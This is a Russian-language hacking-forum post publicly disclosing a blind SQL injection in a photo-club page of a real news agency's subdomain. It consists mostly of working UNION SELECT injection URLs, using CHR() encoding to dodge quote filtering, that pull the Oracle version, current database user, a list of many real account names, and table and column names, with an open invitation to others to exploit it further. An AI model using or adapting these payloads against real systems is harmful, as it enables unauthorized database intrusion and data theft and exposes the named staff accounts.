Форум АНТИЧАТ - Показать сообщение отдельно

http://www.operator.vesti.ru/

Слепой SQL-Injection с фильтруемой кавычкой на сайте информационного агентства "ВЕСТИ". В Oracle имеется куча таблиц, куча схем, коммерческая информация... В общем очень большой объём. Вникать что к чему не было времени. Кому интересно - разбирайтесь. Атака была начата с поддомена чтобы не светиться особо с багой.

По характерному поведению удалось выяснить, что там крутится Oracle:

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=1+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=2+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=3+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=4+--+
http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.B,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,BANNER+B+FRO M+V$VERSION)+T+WHERE+R=5+--+

Oracle9i Enterprise Edition Release 9.2.0.4.0 - 64bit Production
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Solaris: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+USER,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+DUAL+--+

Пользователь, от которого работает пага: www

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.UN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,USERNAME+UN +FROM+ALL_USERS)+T+WHERE+R=X+--+

Можем посмотреть других порегеных пользователей: UTRO, RTRSALE, CULTTV, CULTRADIO, CULTGDRZ, RADIORUS, CULTCORP, CAMERAMAN, AGENCY, RMANCAT, EXPORTER, WWW, SSL, BVB, ALINA, NIKOLAEVA, OPERATOR, LOADER, KIRA_CH, NEWSUN, GENE, BELKINA, ANGELINA, IGRITSKY, BABINTSEVA, BEREZHANSKII, LOGUNOV, PRIOROV, BIRD, FISHER, RYABOVA, ANDREEVA, MALASH, TITOVA, YUDINA, ELIAS, TRAVINSKAYA, SKOPINCEVA, ARTUR, DENIS и т.д.

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN||CHR(32)||CHR(45)||CHR(32)|| T.O,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+F ROM+(SELECT+ROWNUM+R,TABLE_NAME+TN,OWNER+O+FROM+AL L_TABLES)+T+WHERE+R=X+--+

Смотрим таблиц и овнеров таблиц. Не забываем, что наш овнер - www

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.TN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+ROWNUM+R,TABLE_NAME+ TN+FROM+ALL_TABLES+WHERE+OWNER=CHR(..)||...||CHR(. ..))+T+WHERE+R=X+--+

Можем смотреть таблицы по определённому овнеру. Овнера разумеется посимвольно заворачиваем в CHR().

Цитата:

http://www.operator.vesti.ru/photoclub?usr_id=-362+UNION+SELECT+T.CN,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL+FROM+(SELECT+COLUMN_NAME+FROM+USE R_TAB_COLUMNS+WHERE+TABLE_NAME=CHR(70)||CHR(85)||C HR(83)||CHR(69)||CHR(82)||CHR(83))+T+WHERE+R=X+--+

Так можно смотреть имена полей таблиц на примере таблицы FUSERS.